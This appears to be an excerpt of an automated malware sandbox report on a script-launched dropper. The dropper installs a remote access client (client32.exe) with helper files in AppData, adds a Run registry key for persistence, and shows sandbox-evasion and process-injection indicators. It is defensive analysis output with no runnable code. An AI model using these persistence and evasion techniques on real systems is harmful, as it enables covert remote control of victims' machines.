                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WZZCVTPAZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,13_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,13_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11113380 IsIconic,GetTickCount,13_2_11113380
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,13_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,13_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,13_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,13_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,13_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,13_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,13_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,13_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,13_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,13_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,13_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,13_2_11024880
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,13_2_11029BB0
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Delayed program exit found
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110B86C0 Sleep,ExitProcess,13_2_110B86C0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7572Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2285Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeWindow / User API: threadDelayed 8212Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\HHIAHYOW-5\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeEvaded block: after key decisiongraph_13-62928
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeEvaded block: after key decisiongraph_13-62945
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeEvaded block: after key decisiongraph_13-63670
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeEvaded block: after key decisiongraph_13-67525
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeEvaded block: after key decisiongraph_13-67130
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeEvaded block: after key decisiongraph_13-67895
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeEvaded block: after key decisiongraph_13-67862
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_13-67267
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_13-62911
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeAPI coverage: 6.4 %
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4872Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe TID: 4064Thread sleep time: -72750s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe TID: 676Thread sleep time: -32300s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe TID: 4064Thread sleep time: -2053000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,13_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,13_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,13_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,13_2_1106ABD0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8322BBF GetSystemInfo,10_2_00007FFEC8322BBF
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: client32.exeBinary or memory string: VMware
                                Source: wscript.exe, 00000009.00000003.2124586436.000002B2CDE34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW ;
                                Source: wscript.exe, 00000000.00000003.1377935458.000002BB09451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lhidFgIBKlJZkbDTZjYGXjxVDpeHYcThIjrSFfcHBrnerdjirXdnIAzaVIllKXwbyuVHlZhqUGMrkeFIxHGPezzaPnRoEYHzwqSQMsmjjpFsmafRWGtBXhFQsjJoBPpyIiOnKhQCxEvwMJZzwpZNUTNhefvHWrUSjtWLiSpxQajuGbOYngvtMMDlRliTehdiVsBczwCenIcSsmQnQeEpxSyGSbaMtUHrclvxZQlvkeLkFVktOwFwHtfACmztHWNcJRwjCnTgFgVArhtWLpezcWntyaXUTDQznlxLwqlApXmCpuMtDwYxMJoBJXSOvdMcRAwckvayZhBMbOaYBgBWToMubukzAAMrTCkZBtjYHxczpwuULGGmbMXOIZfhrauiXqwZMWBqvgXUGHzLmDOdSNbiGrtBhLWYXOXAfuelZrCZPspTsUdCWMtqKNYEtjBPlfPLwsGHWDIxpUJgtXkcnEYyYZJkaTVCseQemUmxRuxCbgnxDKynHaWEIzijkFRvTsxXivElDcaJYsNuBEOeUaczPsalaoPGLQtLKSUMNwDQPdXJiEZXhSkfDhMSNzTVhpPWURnLtlTCIAlsKUdEOsvUzBpNFCTdVMXpOHlUOiXztKtkUHnjNmvxtBTZlNQUQHNaUDPvcoYHuhzwinCKlVGlxrEHhCkZMGjTfuksDgaJpgVouZoplMZcpBZBYydzEqewtNmJcygGuRYXTqiSnzkIbtZgHNGOHQxvPnRuictJfdenEFPDTCrhXeWKFvmXCvxNbfiNjTSxSeRvPirvCGDxDiiGRSZqblekfERtAPNyCYWRlryRjcJZkGUYTmhJiQLJVQGJNgCZbXGFLljvqeRrFoUBwFtMdvKTJdmLqzmszSlphVwVFjcFDWTKoLgqVpPhMNQjICyudFqSwwdAvZmcsOkKmSaPOIKEmJaskdowmeVXSvzBymDoYnlGSgtYfcjMIEVWokYtdjrMpqoJaQQmGdHiHcgmfiBgEmREmRrvexZmrqUOtCecJHLsWSDIasLCfgUIFjeHaJzfXDHygYwnwfkkCzhoZWWgePxONmiujtGkGqIdyQZmyaDsZaGOtWuXXbzKWafNIbIRaJxBlyVdVkaCFDfnPXikdDZUfMMEbGGMAXBbiyjmtGtLqtWLLIXWjxBblNLniVuyfEYKyMHOMfUQYDwOubPOnwqohDPLoGFABrijoXnSgDkedDoPTzJqTfGNTGshlIAGeBvyenxhQjaOjxrVpSZMWchSMqGJOVSFZZGNMhkZRzkntmywEjzGMZhQFyarUQBJbpFdDPwnNeiiGHDaKkUveWRriXJWyiVuxKnXlyAGsrJIAkLMqnSjFkDpynTXPifwDnMMwtpzMahCuXWBGQCaEHyhRGovOEelmYKDzTtjagHEnmbrOCBJTVSWdmEwptCAVnjFtwxLNNQYjFvlNPFGafTzFPouIIqbBTDSudCyoThbDAktgBjKhpAZwHZJNTjqSURLFSUcrycXFjUwcEPaixGpwieCBMoIErloCSXgiAbZxxVVCLGcXExOwsrYVhIiTKBCyZBcLMUiZchsnbzBxQumYVndEmmYMEharqKZqYuyNiURhZbvhOjXJsqqjbbPlKOLyCetmmFCFyMQOQEBhvpPLuTwTleNvggdFohkhbYHcEqPXzGhSUAmUNFlHBJcTUIRHSmlLwOCirdQlCPHysyHuDUjRXTozpIHrfACJXSGHEEHbfenFjHQkOwvtwrOeoBCwrZwYUeiHQLaOyqgiBUgsvlScEXTQhUJiUyAxlimBvcKCRfaBSBNPLNYcYVTRFPzBJXRxqZQbzakWMpbNePSEqKfqMFOXImwUzEnSpHhGUldLYWlFQAJTxRbjfGSJDANtVKDsZEitgqkpWNdVWhyXlfQQhgmPptdXQDYzFoneslpbTnNDHnsYdcNKdyJjQeLmechXGmEAisyMnIFrqQhqqiYXmBAvkZzyoYzLWbKrmirdaRQDZfdbGCNZoWLcUdcwlDMmRjlBHwvzBhLAKRpxWSmffJdubLFSrGbogwy
